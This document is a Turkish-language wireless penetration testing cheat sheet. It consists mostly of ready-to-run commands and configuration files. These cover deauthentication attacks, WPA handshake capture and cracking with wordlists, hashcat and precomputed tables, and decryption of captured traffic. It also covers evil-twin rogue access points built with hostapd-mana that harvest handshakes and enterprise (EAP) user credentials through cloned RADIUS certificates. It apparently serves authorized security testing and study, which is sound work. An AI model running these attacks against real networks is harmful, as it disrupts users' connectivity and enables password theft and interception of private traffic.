Wireless Pentest

Hazırlık

airmon-ng # Wireless Interfaces
airmon-ng check # Kapatılması gereken servisleri listeler
airmon-ng check kill # Servisleri kapatır
airmon-ng start wlan0 # Monitor modu başlatır
airmon-ng start wlan0 2 # Belirli bir kanalda başlatır
airmon-ng stop wlan0mon # Monitor modu kapatır

iw dev wlan0mon info # Interface bilgileri gösterir
iwconfig wlan0mon # Aynı

Airodump (Sniffing)

airodump-ng -c 2 wlan0mon # Access Point ve Station Gösterir ve handshake toplar
airodump-ng -c 2 --bssid <AP_BSSID> wlan0mon # Sadece belirli AP'yi izler
airodump-ng --output-format csv,pcap wlan0mon # Çıktı formatı belirler

SPACE # Pause Start
TAB # Scroll
M # Renk Seçme
A # Görüntüleme Seçimi
S # Sorting Seçenekleri

Aireplay (Trafik Oluşturma)

aireplay-ng -9 wlan0mon # Inject edilebilen AP'leri listeler (Tek kanalda olmalı)
aireplay-ng -9 -e testwifi -a <AP_BSSID> wlan0mon # Tek AP'de test eder
aireplay-ng -9 -e testwifi -a <AP_BSSID> wlan0mon -D # AP Detection kapar
aireplay-ng -9 -i wlan1mon wlan0mon # Card-to-card injection (Daha sağlıklı)


aireplay-ng -0 1 -a <AP_BSSID> -c <STATION_BSSID> wlan0mon # Deauth Saldırısı
aireplay-ng -0 1 -a <AP_BSSID> wlan0mon # Broadcast Deauth

Aircrack (Handshake Kırma)

aircrack-ng -S # Benchmark

# Handshake ile parola kırar
aircrack-ng -w /usr/share/john/password.lst -e wifiname -b <AP_BSSID> wpa.cap

Airdecap

airdecap-ng -b <AP_BSSID> test.cap # Cap dosyasında filtreleme yapar
airgraph-ng -i wifi.csv -o capr.png -g CAPR # Client-to-AP-Relationship grafiği
airgraph-ng -i wifi.csv -o capr.png -g CPG # Client Probe Grafiği

# Trafiği çözer
airdecap-ng -b <AP_BSSID> -e wifiname -p password123 wpa.cap

Deauth Saldırısı

BSSID Lookup: https://www.wireshark.org/tools/oui-lookup.html

ESSID Lookup: https://wigle.net/

airodump-ng wlan0mon # Saldıracağımız ağı buluyoruz (Client olmalı)
airodump-ng -c 3 -w wpa --essid wifi_name --bssid <AP_BSSID> wlan0mon
aireplay-ng -0 1 -a <AP_BSSID> -c <STATION_BSSID> wlan0mon
aireplay-ng -0 1 -a <AP_BSSID> wlan0mon

aircrack-ng -w /usr/share/john/password.lst -e wifi_name -b <AP_BSSID> wpa-01.cap
airdecap-ng -b <AP_BSSID> -e wifi_name -p password123 wpa-01.cap

Wordlist Rules

code /etc/john/john.conf # Line 961 regex rules
john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e wifi_name -w - wpa-01.cap

# @ lowercase or the specified chars
# , uppercase
# % numbers
# ^ symbols
crunch 8 9 abc123 # a3aac2311
crunch 11 11 -t Password%%% # Password984
crunch 1 1 -p abcde12345 # 53ed214cba
crunch 1 1 -p dog bird fox # birdfoxdog
crunch 5 5 -t ddd%% -p dog bird fox # foxdogbird86
crunch 5 5 aADE -t ddd@@ -p dog bird fox # foxdogbirdAE

crunch 8 9 abc123 | aircrack-ng -e wifi_name wpa-01.cap -w -

rsmangler --file wordlist.txt --min 12 --max 13 --output mangled.txt
rsmangler --file wordlist.txt | aircrack-ng -e wifi_name wpa-01.cap -w -

hashcat -I # OpenCL varsa çok yavaş direkt aircrack kullan
hashcat -b -m 2500
hashcat --help

/usr/lib/hashcat-utils/cap2hccapx.bin wpa-01.cap output.hccapx
hashcat -m 2500 output.hccapx /usr/share/john/password.lst

Airolib

airolib-ng wifi.sqlite --import essid essid.txt
airolib-ng wifi.sqlite --import passwd /usr/share/john/password.lst
airolib-ng wifi.sqlite --batch
airolib-ng wifi.sqlite --stats

aircrack-ng -r wifi.sqlite wpa-01.cap # Çok daha hızlı kırar önceden hesaplandığı için

Cowpatty

genpmk -f /usr/share/john/password.lst -d wifihashes -s wifi_name
cowpatty -r wpa-01.cap -d wifihashes -s wifi # Çok daha hızlı

Rogue AP

  • ESSID ve BSSID

  • Auth Türü (WEP, WPA, WPA2, WPA3)

  • PSK var mı

  • Channel No

airodump-ng -w discovery --output-format pcap wlan0mon
# wlan.fc.type_subtype == 0x08 && wlan.ssid == "wifi_name"

# Wireless Management > Tagged Params > Vendor Specific
# Wireless Management > Tagged Params > RSN (WPA2)
# Wireless Management > Tagged Params > RSN > Pairwise List (TKIP)
# Wireless Management > Tagged Params > Vendor Specific > Unicast List (TKIP)
# Wireless Management > Tagged Params > RSN > Auth Key Management (PSK)
# Wireless Management > Tagged Params > Vendor Specific > Auth Key Management (PSK)
code wifi_name-mana.conf
interface=wlan0
ssid=wifi_name
channel=1
ieee80211n=1
hw_mode=g # 2.4 GHz=g, 5 GHz=a
wpa=3 # WPA=1 WPA2=2 İkisi de=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=password123 # Fark etmez
wpa_pairwise=TKIP CCMP
rsn_pairwise=TKIP CCMP
mana_wpaout=/root/Desktop/wifi_name.hccapx
hostapd-mana wifi_name-mana.conf
# Eğer bizim AP hedefe gerçek AP'den daha yakınsa handshake alabiliriz
aireplay-ng -0 0 -a <AP_BSSID> wlan0mon
aircrack-ng wifi_name.hccapx -e wifi_name -w /usr/share/john/password.lst

WPA Enterprise

  • Küçük işletmeler için mantıklı çünkü bir private key ile bağlanılıyor.

  • Büyük işletmelerde bu key çalınabilir o yüzden mantıksız.

airodump-ng wlan0mon # AUTH MGT Gözükmeli
airodump-ng -c 2 -w wifi_name wlan0mon
aireplay-ng -0 1 -a <AP_BSSID> -c <CLIENT_BSSID>


wlan.bssid==<AP_BSSID> && eap && tls.handshake.certificate
# Aşağıdaki sertifikayı bulup export packet bytes yapıyoruz (cert.der)
# Extensible Authentication Protocol > TLS 1.2 > Handshake > Certificate > Certificate 2.

openssl x509 -inform der -in cert.der -text # Kontrol edebiliriz

code /etc/freeradius/3.0/certs/ca.cnf
code /etc/freeradius/3.0/certs/server.cnf
# 49-56 arasını sertifikadaki bilgiler ile değiştiriyoruz

cd /etc/freeradius/3.0/certs/
rm dh
make # Sertifikaları yeniden derliyoruz. Sonda hata verebilir, normaldir

code /etc/hostapd-mana/mana.conf 
ssid=wifi_name
interface=wlan0
driver=nl80211
channel=1
hw_mode=g
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=password123
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout/tmp/hostapd.credout
mana_eapsuccess=1
mana_eaptls=1
code /etc/hostapd-mana/mana.eap_user

*      PEAP,TTLS,TLS,FAST
"t"    TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2   "password123"   [2]
hostapd-mana /etc/hostapd-mana/mana.conf
# Eğer bir kullanıcı parola girerse asleap komutunu kopyala
asleap -C xxxxx -R xxxxxxxxxxxx -W /usr/share/john/password.lst
cat /tmp/hostapd.credout
